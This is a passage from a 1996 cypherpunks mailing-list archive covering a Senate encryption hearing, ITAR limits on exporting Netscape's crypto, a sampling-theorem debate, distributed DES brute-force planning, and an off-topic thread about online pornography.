     encryption experts, members of the committee, and other concerned 
     individuals are available at:
     
     http://www.crypto.com/hearing-cybercast/
     
     Witnesses scheduled to testify at Thursday's hearing include:
     
     * Louis Freeh,  FBI Director
     * William Reinsch, Undersecretary, Bureau of Export Administration,
     Dept. of Commerce
     * William P. Crowell, Deputy Director, NSA
     * James Barksdale, CEO Netscape Communications Corporation 
     * Grover Norquist, Director, Americans for Tax Reform
     * Roel Pieper, Pres/CEO Tandem Computer 
     * Ambassador Michael Skol
     
     The Cybercast, which is being coordinated by the Center for Democracy 
     and Technology, Voters Telecommunications Watch, HotWired, DIGEX, and 
     Mike Rawson of Senator Burns' office, has four components.  These are:
     
     1. LIVE AUDIO CYBERCAST: The audio portion of the hearing will be
     cybercast live online in real-time. Anyone with RealAudio installed on 
     their computers (available free at http://www.realaudio.com/) will be 
     able to listen in on the hearing.  Audio transcripts will also be 
     archived online at http://www.crypto.com/events/072596/ after the 
     hearing.
     
     2. REAL-TIME PICTURES: Pictures from the hearing will also be uploaded
     to the World Wide Web in real time throughout the hearing.
     
     3. SIMULTANEOUS ONLINE DISCUSSION FORUM: Netizens can also join a live
     discussion forum where encryption experts and Commerce Committee staff 
     while they listen to the audio portion of the hearing.  This provides 
     an opportunity to discuss the issues raised by the testimony in real 
     time with knowledgeable experts and Congressional staff. Several 
     members of the Commerce Committee may also join the discussion 
     periodically (TBA).
     
     4. TESTIMONY FOR THE RECORD: Netizens can also submit their thoughts 
     on the  legislation for the record via the World Wide Web.  Details 
     are posted at the http://www.crypto.com/events/072596/. 
     
     Finally, detailed background information on the encryption debate can 
     be found at the following World Wide Web sites:
     
     Senator Conrad Burns (R-MT)           - http://www.senate.gov/~burns/ 
     Senator Larry Pressler (R-SD)      -http://www.senate.gov/~pressler/   
     Senator John Ashcroft (R-MO)        -http://www.senate.gov/~ashcroft/
     Senator Patrick Leahy (D-VT)          - http://www.senate.gov/~leahy/ 
     The Encryption Policy Resource Page   - http://www.crypto.com/
     The Internet Privacy Coalition        - http://www.privacy.org/ipc
     
     Your thoughts and comments on this issue are extremely helpful to us 
     as we continue to push for passage of legislation to enhance privacy 
     and security on the Internet. We hope you will join us on Thursday for 
     this important experiment in the future of democracy.
     
     Sincerely,
     
     Sen. Conrad Burns
     Sen. Larry Pressler
     Sen. John Ashcroft





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Thu, 25 Jul 1996 14:42:07 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billbo
In-Reply-To: <199607241517.LAA18088@jekyll.piermont.com>
Message-ID: <199607250438.VAA02125@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


"Perry E. Metzger" <perry@piermont.com> writes:

 > The Nyquist Theorem states you need exactly twice the
 > samples, not over twice. The magic number isn't something
 > like 2.2, its exactly 2.

The Sampling Theorem states that equally spaced instantaneous
samples must be taken at a rate GREATER THAN twice the highest
frequency present in the analog signal being sampled.  If this is
done, the samples contain all the information in the signal, and
faithful reconstruction is possible.

Exactly twice the highest frequency won't do, and it should be
obvious that sampling a sine wave at twice its frequency yields
samples of constant magnitude and alternating sign which convey
nothing about its phase and little useful about its amplitude
either.  (Drawing a little picture might be helpful here.)

Although anything over twice the highest frequency will work in a
theoretical sense, a small fudge factor does wonders for digital
signal processing, if only to reduce to a reasonable value the
width of the window into the sample stream needed for various
signal manipulations.

--
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 25 Jul 1996 15:27:52 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: When books are outlawed
Message-ID: <2.2.16.19960725045950.0877adc2@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:07 PM 7/24/96 -0400, Alan Horowitz wrote:
>
><< On Our Backs magazine>>
>
>That's "Off Our Backs".  Very much at the forefront of the 
>PC-gestapo-thought-police trend.

Both are (or were) magazines, "On Our Backs" appearing some years after
"Off" and appealing to a different (but still lesbian) market segment. 
--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 25 Jul 1996 09:39:03 +0800
To: cypherpunks@toad.com
Subject: Pro-Crypto Fireworks
Message-ID: <199607242219.WAA05628@pipe5.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Fireworks expected at Thursday encryption hearing 
 
            
   Washington, July 24 (Reuter) -- After sailing through two 
   quiet subcommittee hearings, a bill to relax restrictions 
   on computer encoding faces a much choppier ride before the 
   full Senate Commerce Committee on Thursday. 
 
   The committee will hear from some of the Clinton 
   administration's big guns on crime and national security, 
   including FBI Director Louis Freeh and William Crowell, 
   deputy director of the National Security Agency. [Snip] 
 
   Netscape's James Barksdale, who entranced senators at a 
   June 12 subcommittee hearing, will return Thursday to again 
   make the case for relaxing export restrictions. [Snip] 
 
   Others expected to testify Thursday include William 
   Reinsch, undersecretary for the Bureau of Export 
   Administration at the Commerce Department; Tandem Computers 
   Inc. President Roel Pieper; and Grover Norquist, president 
   of Americans for Tax Reform. 
 
   The hearing will be broadcast live over the Internet, 
   starting at about 9:15 a.m. EDT using Progressive Network's 
   Real Audio software. The technique was first used at a June 
   26 subcommittee hearing on the encryption bill. 
 
   Computer users anywhere in the world with sound capability  
   can tune in at http://www.hotwired.com/wiredside. 
 
   ----- 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 25 Jul 1996 16:10:20 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
Message-ID: <199607250554.WAA18236@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>     I don't know if it was terrorist activity, I was just annoyed at 
>the extensive every 15 minutes even tho' there is nothing new to say I 
>gotta get my mug and my voice on the ether coverage. 

It's also yet another excuse for the government to say
"Be Afraid!  Be Very Afraid!  We're Here To Help You" - 
Clinton's first speech after the event had him bringing up
terrorism and making sure everyone knew that even though there was
as yet no evidence that it wasn't an accident, he was tough on terrorism
and he'd be making sure we have more controls on the population to
protect us from terrorists.  I'm surprised I haven't heard Kallstrom
calling for radically increased wiretapping yet or Freeh calling for
bans on encryption like he did after OKCity.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 25 Jul 1996 13:44:45 +0800
To: cypherpunks@toad.com
Subject: Re: Parsing John Youn (Re: OPS_nuk)
In-Reply-To: <199607241920.TAA22026@pipe2.t1.usa.pipeline.com>
Message-ID: <v03007607ae1c921deecd@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:20 PM -0400 7/24/96, John Young wrote:
> Tim, pity the moot transcriber a-choring (spit). It's a grind (pus)
> forwarding other's fishwrap (buggers), hardly able to contain one's
> gibbering idiocy (pee) counterreaction to the new's gratuitous fatuity
> (dookie).
>
>
> Usually, though, one's bowel-rumblings (Bic lits) pass unnosed in the
> c'punk parfumerie.

Yeah.

What *he* said...

;-)

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Thu, 25 Jul 1996 14:10:01 +0800
To: cypherpunks@toad.com
Subject: Exportable Netscape with strong crypto...
Message-ID: <199607250353.XAA19243@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


An alternative to exporting a strong Netscape might be to build a 
browser outside the USA with a strong SSL.

Mosaic source can be licensed, correct?  What's to stop a non-US 
company from licensing it and modifying it to have strong crypto, 
then making that version freely available as shareware, or perhaps 
with non-crypto goodies locked out in the free version?  Or even 
selling it commercially with strong crypto?

Rob


---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jul 1996 17:43:17 +0800
To: Bill Stewart <snow@smoke.suba.com>
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
Message-ID: <2.2.32.19960725070143.00d3a1b8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:51 PM 7/24/96 -0700, Bill Stewart wrote:

>I'm surprised I haven't heard Kallstrom
>calling for radically increased wiretapping yet or Freeh calling for
>bans on encryption like he did after OKCity.

As if it would have done any good.  One of the news reports pointed out that
if it was a bomb, it had probibly been placed on the plane in Greece.

(But then, since when did logic and rationality have *ANYTHING* to do with
the Freeh and Kalstrom wiretap jihad.  I am waiting for one of them to get
arrested as a peeping tom.  Something deepseeted about these people's fetish
about watching others...)
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jul 1996 17:52:11 +0800
To: Arun Mehta <cypherpunks@toad.com
Subject: [Noise] [Smut] [Off-topic] Re: A Global Village, or the future of porn on the net
Message-ID: <2.2.32.19960725070145.00d77a58@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:04 AM 7/25/96 +0600, Arun Mehta wrote:
>At 10:00 24/07/96 +0000, Alex F wrote:
>>
>>why is it that Bill(ary) signed an unconstitutional law?  I 
>>am referring to the CDA and the telephony bill. 
>
>... arguments that I wholeheartedly support deleted..
>
>>Anyway, getting off-topic again.  I'll be quiet now :)
>
>Let me see if I can bring this back on track. We have some interesting
>developments that could converge:
>
>1) Legally, the Internet is more or less in the clear as far as indecency
>is concerned. The moralists will rally again and put through a bill that
>doesn't so blatantly violate the constitution, but for the time being
>we're OK.

Unless they start using prosecutions similar to what they pulled back during
the Meese years with video distributors.  I am waiting for them to start
using RICO laws on sites carrying Usenet groups deemed "obscene".  RICO has
already been used in some juristictions for shutting down video stores (and
maybe even bookstores).  It is not over yet...

The control freaks will not be happy until everything you view and see has
previously been approved by some board or ministry.  (Or they at least have
some way of hurting you if you step out of line.)  Whether that control
freak behaviour is driven by religion, morality, "your own good", greed,
power or lust does not matter.  the results are pretty much that same.

>2) Porn is very, very popular. As a consultant, I often use Netscape from
>the offices of my clients, and invariably take a peek at the bookmarks. 
>Guess what is  pointed to more than anything else. By making a hullaballoo
>about porn on the net, its enemies may have shot themselves in the foot:
>it will attract people rather than repel.

But there is a social stigma surrounding porn.  Most people who look at porn
are not willing to admit it in front of friends and family.  many of the
more vocal opponnents to porn are the ones most attracted to it.  Look at
jimmy Swagart.  He crusaded against it for years.  Never stopped "Lonesome
Cowboy Jim" (5 point if you can name that album and artist) from wanking off
to it...

>3) Porn on the net by and large isn't all that great, so if there is a risk, 
>it is that people might be bored. What you mostly have are stills of nudes
>on the web and Usenet postings of indifferent quality.

Depends where you go.  Most of the Usenet stuff is crap, but that is true of
any medium.  (It is called a medium becuase it is rarely well done. (Stolen
line...  Forget the original author.))  There are exceptions.  Usenet will
give you smut that may (or is) illegal in your area.  Some of this sort of
stuff can be mail ordered, but there is more risk.  (Like postal service
stings/entrapment and the like.)

There is much better quality available on the pay sites, but since you
usually have to pay to view any of it, you never know what is available
until you have forked out a bit of cash.  (I am surprised I have not seen
more sites using e-cash for this purpose...  Porn drove the VCR industry for
many years.  I expect the same for the web and e-cash.)

>4) the web is changing from static to dynamic through Java and the like. 
>VRML in fact adds a 3-D element.

Most pay-for-porn sites are going for interactive video instead of java
and/or vrml.  (Yes, you can pay $$$ to duplicate the experience of a stroke
booth via the net.  All you lack is the resolution, the interaction, and the
requisite sleeze of the experience.  Dancers the size of postage stamps!  Wow!)

>Stir, add some spicy curry, and see if you get:
>
>Java classes for males and females corresponding to VRML
>objects. The class methods might include kissing, hugging,
>spanking, restraining...

Might be interesting...  This is more evident in CD-ROMs though.

>A female object might be  initialized with Hillary Clinton's face,
Evangelista's
>body... 

I think that was the cover of Spy magazine...

>Anyone could now write a script which you could view enacted on
>your screen, or interact with one another as in MUDs. Why,
>someone might write a translator 
>that takes a story off alt.sex.whatever and produces
>an appropriate script. People would only need to download the software and
>appropriate objects once, then receive emscripts which could be
>run in total privacy.

"Be a Great porn Actor at Home!"  Reenact bad plots, cheezy dialog, and bad
writing in the privacy of your living room!

>People should we willing to pay small amounts for use of the
>classes and objects,
>as well as for the scripts. Of course, it would only work in our
>prudish societies if
>the transactions were totally anonymous. If Digicash payment
>systems were built-in,
>that might be a reason for people to start adopting eCash.

Well, if it is something that will cause arousal in male humans (or computer
geeks), I am sure you can sell it.

>Of  course, this opens up a whole can of worms. For instance,
>given the violence of
>many pornographic stories on Usenet, it won't be long before
>famous personalities
>routinely get violated in cyberspace. Talk about copyright: do
>you have the right
>to prevent someone from doing this to you?

Porn stories and/or hacked pictures of celebrities already occurs.  Has
since I have been on usenet...  (Many years now.)  One of my favorites
involves the Brady Bunch...  In fact there are celebrities who have hired
people to track down phoney pictures and get them pulled from web sites.

(I always expected something like this to show up on Star Trek:TNG.  Having
Beverly Crusher catching Weasly with the holodeck porn programs involving
all sorts of convelutions of the bridge crew.  He would probibly blame it on
Riker...)

>I unfortunately lack  the bandwidth to find out the extent to
>which porn on the net
>is already moving in this direction. However, if you have
>pointers, I'll go *find*
>the bandwidth! Where on the net do people discuss such matters?

Bandwidth is the only thing preventing the smut from getting farther than it
already has.  The easiest way to kill a web server is put porn on it and
advertise.  All of the schemes coming out for "cool gee-whiz web extensions"
take more bandwidth than most people have...  Just wait and see what happens
when cable modems become available.

Check out the alt.sex heirarchy.  Something there I am sure...

---
|"Computers are Voodoo -- You just have to know where to stick the pins."|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Thu, 25 Jul 1996 18:05:16 +0800
To: The Deviant <stewarts@ix.netcom.com>
Subject: Re: DES-Busting Screen Savers?
Message-ID: <2.2.32.19960725070623.00d40f54@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:01 AM 7/25/96 +0000, The Deviant wrote:

>> To support scaling, make it easy for people to run subset servers;
>> grab a chunk of keyspace from the main server and dole it out
>> to people who ask you for it.  If you want to get fancy,
>> hack a DNS server to allow people to register their machines
>> as NNN.descrack.org, 0<=NNN<1000, so that people can find 
>> subsets without having to ask the main server.
>> 
>
>Or hack it to use a 56 bit IP netmask-ish thing, and keep track of keys
>that way (i'm not endorsing this idea, just pointing it out)

I can see some problems doing this sort of allocation for those of us on
dial up providers.  When the IP address changes from log in to log in
recording the IP address is not much help.

You could always hand them a digital signature with the key space signed by
the server...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 25 Jul 1996 07:03:21 +0800
To: cypherpunks@toad.com
Subject: Would Netscape take money for 'exported' copies?
Message-ID: <1.5.4.32.19960724181410.002de7b4@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 22:13 23/07/96 -0400, Anonymous Remail Service wrote:

>As I have said before, European & other foreign users, who get the strong-
>crypto version should pay Netscape what they owe Netscape, to keep the ITAR
>as the issue, and not piracy. 

Yes, but could/would Netscape even take our money? Wouldn't  that be
complicity (IA obviously NAL)? I'd imagine they'd just return the
money, and tell
us to please destroy our copies of the software.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 25 Jul 1996 06:30:58 +0800
To: jim bell <cypherpunks@toad.com
Subject: Re: NSA Lawyers Believe ITARs Would be Overturned if Tested in  Court
Message-ID: <1.5.4.32.19960724181417.002d9ab4@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 21:32 21/07/96 -0800, jim bell wrote:

> Why aren't they (still) restricting 
>PC-type computers for export? 

Because, I imagine, it did not stop the clones from Taiwan, but severely
hurt US computer manufacturers. Ultimately, this is the argument that 
will bring the US government kicking and screaming to its senses on
the cryptography issue.
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Olmur <olmur@dwarf.bb.bawue.de>
Date: Thu, 25 Jul 1996 09:33:23 +0800
To: trei@process.com
Subject: Re: Brute Force DES
In-Reply-To: <199607222043.NAA06313@toad.com>
Message-ID: <m2687dxpfk.fsf@dwarf.bb.bawue.de>
MIME-Version: 1.0
Content-Type: text/plain


I have to offer an RS/6000 (PowerPC) and a P150 working full-time and
another RS/6000 and 10-15 Pentiums working nights and weekends.

Michael




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 25 Jul 1996 18:34:55 +0800
To: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Subject: Re: Netscape (foreign downloads)
In-Reply-To: <1.5.4.32.19960724124517.002e1fcc@giasdl01.vsnl.net.in>
Message-ID: <31F726D3.764B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Arun Mehta wrote:
> 
> At 01:11 23/07/96 -0700, Jeff Weinstein wrote:
> 
> >  I certainly have sympathy for those who want to make a point
> >by uploading our US software to hacktic and other foreign servers,
> >but I think that my company will probably have to ask hacktic
> >and others to remove these copies.
> >
> 
> And what are your plans for those outside the US who have downloaded
> from hacktic? While I'm sure your copyright allows you to do so,
> don't suppose you have any plans of going after them?

  No, I don't think we have any plans to go after individuals who
get ahold of the US version. 

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@c2.org (Anonymous User)
Date: Thu, 25 Jul 1996 18:56:17 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 3.0B US version MD5
Message-ID: <199607250805.BAA27161>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein <jsw@netscape.com> wrote:

>   The final version of 3.0 will be available for download well
> before Sept 17.  That version will not have a timebomb.  Even
> the timebombed versions will let you connect to our site to
> download new versions.

Is there a possibility that the US version of Netscape 2.02 for
Windows 3.1 will be made available via this mechanism?

I run OS/2 in a WinOS/2 session under OS/2 Warp, and the 16 bit
version of 2.02 is the latest one that us OS/2 Warp users of
Netscape have been able to get working.  None of the 3.0 betas
will work, for some reason.

(If you have a "wish list" there, a native OS/2 version of Netscape
would be nice, too! <g>)






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Thu, 25 Jul 1996 18:17:15 +0800
To: cypherpunks@toad.com
Subject: Re: Digital Watermarks for copy protection in recent Billbo (fwd)
Message-ID: <199607250621.BAA07021@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

The Sampling Theorem in operation is a little more complicated than the
model that is being discussed.

Forwarded message:

> From: mpd@netcom.com (Mike Duvos)
> Subject: Re: Digital Watermarks for copy protection in recent Billbo
> Date: Wed, 24 Jul 1996 21:38:36 -0700 (PDT)
> "Perry E. Metzger" <perry@piermont.com> writes:
> 
>  > The Nyquist Theorem states you need exactly twice the
>  > samples, not over twice. The magic number isn't something
>  > like 2.2, its exactly 2.
> 
> The Sampling Theorem states that equally spaced instantaneous
> samples must be taken at a rate GREATER THAN twice the highest
> frequency present in the analog signal being sampled.  If this is
> done, the samples contain all the information in the signal, and
> faithful reconstruction is possible.

Actualy the sampling theorem states that if you want to reproduce a signal
reliably it must be sampled at a frequency AT LEAST TWICE that of the
highest frequency of interest in the FFT of the signal. This means the
signal must be deformable into sine waves, not all signals qualify for this
particular limitation and in general are not good signals for sampling.
An example is a step change from v1 to v2. since there is no change in
voltage except for a brief moment the output of the FFT is pretty much flat.
What comes out the other end looks like a spike (similar to what happens when
you feed a square wave to a transformer and look at the output). If you
reconstruct this via the sampling theorem you get a sign wave of extremely
low amplitude and frequency.

If you think of a FFT as taking a signal and breaking it down into componant
frequencies. Then think of a hair comb where the lowest frequencies are the
bigger teeth (put them to the L. when looking at it). Because sign waves
have zero crossings a single sample per cycle is not enough. By taking at
least two samples a cycle you are guaranteed not to miss the presence or
absence of a componant frequency. So this guarantees that we get a accurate
count of componants and their phase relations to each other (where the
arbitrary time reference comes in - really a fixed frequency clock). Back to
the comb. Where a given signal has a componant leave the teeth. Where there
is no componant break them off. You are left with a ratty looking comb. Now
to each of the remaining teeth assign an amplitude for that specific
frequency that is consistent with the FFT you calculated. The way this FFT
is implimented in practice is called a 'Comb Filter' where it samples the
signal (wide bandwidth) over a set of very small bandwidth filters in
parallel. Scanning the output of the filters at a fixed rate you get a phase
relation as well. Digitize the signals in a particular pattern and you are
ready to cut your CD or whatever.

It does NOT guarantee faithful representation of the original signal but
rather a signal with the same energy spectrum and phase characteristics.
One of the basic ideas of Algebra is that any given curve can be explained
by a arbitrary set of equations. The Sampling Theorem just gives you a
rationale for picking from that set.

> Exactly twice the highest frequency won't do, and it should be
> obvious that sampling a sine wave at twice its frequency yields
> samples of constant magnitude and alternating sign which convey
> nothing about its phase and little useful about its amplitude
> either.  (Drawing a little picture might be helpful here.)

Exactly what the theorem is supposed to produce. You take your original
signal and run it through a FFT. You look at the bandwidth you desire. The
highest frequency of interest is 1/2 or less your sampling frequency. With
this information you can build a set of sine waves whose amplitude is given
by the FFT along with phase relations. Since you are breaking the signal
into sine waves (which happen to be well defined) all you realy need is to
know the maximum and minimum amplitudes as well as their phase to some
arbitrary but constant time reference. Sum them back together on the other
side and what you got? A reasonable useable copy of your original signal.

This is why DSP's are optimized for multiplication (multiply the amplitude
of that componant by its presence in the FFT) and summing (add them together
to get the target signal). Generaly because of noise and similar phenomena
it is commen to multiply and add windows of samples (ie averaging).

> Although anything over twice the highest frequency will work in a
> theoretical sense, a small fudge factor does wonders for digital
> signal processing, if only to reduce to a reasonable value the
> width of the window into the sample stream needed for various
> signal manipulations.

Actualy I believe the decision was made by Philips (the inventor of the CD)
to settle on the 44kHz sample rate because of some design option it
simplified. I unfortunately don't remember anything more specific than that.
Anyone got the CD Rom bible?

                                              Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Thu, 25 Jul 1996 15:44:17 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Digital Watermarks for copy protection in recent Billbo
In-Reply-To: <199607250438.VAA02125@netcom6.netcom.com>
Message-ID: <199607250525.BAA19198@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mike Duvos writes:
> "Perry E. Metzger" <perry@piermont.com> writes:
>  > The Nyquist Theorem states you need exactly twice the
>  > samples, not over twice. The magic number isn't something
>  > like 2.2, its exactly 2.
> 
> The Sampling Theorem states that equally spaced instantaneous
> samples must be taken at a rate GREATER THAN twice the highest
> frequency present in the analog signal being sampled.

That is just about what I said. The point is that the magic number
isn't 2.2 or anything similar -- the breakpoint is exactly twice the
frequency.

> Although anything over twice the highest frequency will work in a
> theoretical sense, a small fudge factor does wonders for digital
> signal processing,

I believe I mentioned the need for that, too.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: morgan@keilin.helsinki.fi (Joel Morgan)
Date: Thu, 25 Jul 1996 09:33:20 +0800
To: perry@piermont.com
Subject: Re: Brute Force attack Question (basic)
In-Reply-To: <199607241758.NAA18324@jekyll.piermont.com>
Message-ID: <199607242226.BAA10149@keilin.helsinki.fi>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger writes:
> 
> Igor Chudov writes:
> > What is Alice and Bob decide to obscure their letters and add random
> > NON-ASCII  characters at random places?
> 
> Assuming I'm using a statistics based technique, that won't help.
> 

Some fairly basic questions:

1) Is a statistical test like this done on the net composition of the
   whole message or locally, point by point throughout the text (for
   example, using a window)?

2) If what's tested is the net composition of the message, could you
   choose padding to normalize a message back to an apparently random
   distribution?

3) What kind of computation overhead does this statistical testing
   impose (compared to what would be needed for a known-plaintext
   search)?

Thanks,

Joel/ 

-- 
=====================================================================
Joel.Morgan@Helsinki.FI              http://blues.helsinki.fi/~morgan
        
    "Over the mountains there are mountains."   -- Chang-rae Lee 
=====================================================================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 25 Jul 1996 07:19:26 +0800
To: Hal <cypherpunks@toad.com
Subject: Re: Ross Anderson's Eternity service
Message-ID: <1.5.4.32.19960724194115.002ec630@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 20:13 22/07/96 -0700, Hal wrote:
>Sherry Mayo posted here a while back a reference to Ross Anderson's
>Eternity service paper, <URL: http://www.cl.cam.ac.uk:80/users/rja14/#Lib >.

Got that far, but could not download the Eternity service paper
itself. Something about only accepting connections from certain
sites. Would someone kind-hearted enough mail me a copy?
Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 25 Jul 1996 19:34:11 +0800
To: cypherpunks@toad.com
Subject: Re: [Noise] Re: <rant> Re: Devil's Bargain
Message-ID: <2.2.32.19960725084722.006e79f8@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



>protect us from terrorists.  I'm surprised I haven't heard Kallstrom
>calling for radically increased wiretapping yet or Freeh calling for
>bans on encryption like he did after OKCity.

He's saving that for later this morning... 
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Thu, 25 Jul 1996 20:22:21 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607250317.UAA03425@mail.pacifier.com>
Message-ID: <31F73E84.415A@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> At 06:39 PM 7/24/96 -0700, Tom Weinstein wrote:
> >The Deviant wrote:
> >>
> >> I would have suggested even being as nice as "We'll do the same as MIT
> >> does with PGP's distrobution, or RSA does with RSAREF (just so you'll
> >> know, RSA's FTP basicly has a readme file that says "the files in
> >> subdir of a dir thats -r+x to you, so if you're a citizen go to
> >> dist/usaRANDOM_NUMBER_HERE", thats it).  Then make them explain why
> >> Netscape should be any different.
> >
> >MIT reportedly has a letter stating that their systems is okay.  The
> >state department wouldn't give us such a letter because they were
> >"currently reevaluating their guidelines", or some such thing.  We
> >convinced them to give us temporary permission for this system until
> >they had finalized their new policy.
> 
> That still doesn't make since.
> 
> First, there were laws.  And we had to obey them.
> 
> Then, they added ITAR.  And they want us to obey it.
> 
> Finally, it seems, they're giving us "guidelines."  Not law, Not ITAR.
> 
> Next it's gonna be their their fondest desires, their preferences,and
> finally their whims.
> 
> What's wrong with this picture?    Do I detect an ass-kissing contest?

  If we chose to "kiss ass", we would not be distributing software
that does strong encryption over the internet.  We would not be
selling millions of copies in thousands of retail outlets across the
country.  We would be doing what some other companies have been
doing for years, which is only produce export grade crypto, even
for US customers.

  The simple fact is that our executives decided not to provide
our US software for download over the internet until we got
a written statement from the Office of Defense Trade Controls
that we would not be prosecuted for such actions.  This decision
was made by our executives based on advice given them by lawyers
that they trust.  The requirements imposed by the government
were to get this written statement.  

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 25 Jul 1996 04:34:03 +0800
To: Gary Howland <gary@systemics.com>
